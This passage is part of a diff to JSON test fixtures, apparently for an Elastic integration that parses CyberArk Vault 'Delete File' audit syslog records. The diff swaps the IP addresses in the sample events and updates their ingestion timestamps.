\u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.14", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 10:59:57\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T18:59:57Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n 
\u003cMessageID\u003e52\u003c/MessageID\u003e\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\n \u003cAction\u003eDelete File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\n \u003cFile\u003eRoot\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\u003c/File\u003e\n \u003cStation\u003e67.43.156.14\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eDelete File\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Delete File", "message": "Delete File", "issuer": "PSMApp_ASR-WIN", 
@@ -273,8 +262,8 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820723800Z", - "original": "\u003c5\u003e1 2021-03-11T18:59:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:59:57\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:59:57Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\u003c/File\u003e\\n \u003cStation\u003e35.192.121.42\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:59:57\",\"IsoTimestamp\":\"2021-03-11T18:59:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Delete 
File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"Root\\\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:06.873550500Z", + "original": "\u003c5\u003e1 2021-03-11T18:59:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:59:57\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:59:57Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\u003c/File\u003e\\n \u003cStation\u003e67.43.156.14\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
10:59:57\",\"IsoTimestamp\":\"2021-03-11T18:59:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMSessions\",\"File\":\"Root\\\\c89ca3ba9c76f820fdc58e86f2c854f99d232fcd\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\"}}}", "code": "52", "kind": "event" } 
@@ -341,7 +330,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820725300Z", + "ingested": "2021-12-09T13:37:06.873555300Z", "original": "\u003c5\u003e1 2021-03-11T19:32:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:32:12\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:32:12Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_1\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_2\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_3\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"_PSMLiveSessions_4\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"_PSMLiveSessions_5\\\" Value=\\\"\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:32:12\",\"IsoTimestamp\":\"2021-03-11T19:32:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"_PSMLiveSessions_1\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_2\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_3\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_4\",\"Value\":\"\"},{\"Name\":\"_PSMLiveSessions_5\",\"Value\":\"\"}]}}}}", "code": "52", "kind": "event" @@ -375,7 +364,7 @@ }, "@timestamp": "2021-03-11T21:06:40.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-PSMConnect" + "path": "Root\\Operating System-WinDomain-67.43.156.14-PSMConnect" }, "ecs": { "version": "1.12.0" 
@@ -391,19 +380,19 @@ "severity": "Info", "iso_timestamp": "2021-03-11T21:06:40Z", "gateway_station": "10.0.1.20", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 13:06:40\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T21:06:40Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e52\u003c/MessageID\u003e\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eDelete File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-PSMConnect\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eDelete File\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"PSMConnect\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"35.192.121.42\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": 
"\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 13:06:40\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T21:06:40Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e52\u003c/MessageID\u003e\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eDelete File\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSM\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-PSMConnect\u003c/File\u003e\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eDelete File\u003c/Message\u003e\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"PSMConnect\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.14\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Delete File", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, "device_type": "Operating System", - "address": 
"35.192.121.42", + "address": "67.43.156.14", "creation_method": "PVWA", "policy_id": "WinDomain", "user_name": "PSMConnect" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-PSMConnect", + "file": "Root\\Operating System-WinDomain-67.43.156.14-PSMConnect", "safe": "PSM", "station": "127.0.0.1", "action": "Delete File", 
@@ -417,8 +406,8 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820726700Z", - "original": "\u003c5\u003e1 2021-03-11T21:06:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:06:40\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:06:40Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"35.192.121.42\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:06:40\",\"IsoTimestamp\":\"2021-03-11T21:06:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"35.192.121.42\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:06.873560700Z", + "original": "\u003c5\u003e1 2021-03-11T21:06:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:06:40\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:06:40Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n 
\u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-PSMConnect\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.14\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:06:40\",\"IsoTimestamp\":\"2021-03-11T21:06:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-PSMConnect\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete 
File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.14\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "52", "kind": "event" } 
@@ -491,7 +480,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820759300Z", + "ingested": "2021-12-09T13:37:06.873565700Z", "original": "\u003c5\u003e1 2021-03-11T21:06:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 13:06:50\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T21:06:50Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSM-ASR-CYBERARK-WI\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"10.128.0.65\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"ASR-CYBERARK-WI\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 13:06:50\",\"IsoTimestamp\":\"2021-03-11T21:06:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"52\",\"Desc\":\"Delete File\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Delete File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Delete File\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"10.128.0.65\"},{\"Name\":\"LogonDomain\",\"Value\":\"ASR-CYBERARK-WI\"}]}}}}", "code": "52", "kind": "event" 
@@ -565,7 +554,7 @@ "event": { "severity": 2, "action": "delete file", - "ingested": "2021-06-09T10:24:35.820761900Z", + "ingested": "2021-12-09T13:37:06.873570100Z", "original": "\u003c5\u003e1 2021-03-14T12:10:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:10:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:10:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e52\u003c/MessageID\u003e\\n \u003cDesc\u003eDelete File\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eDelete File\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMAdmin\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eDelete File\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMAdminConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"169.254.180.25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" 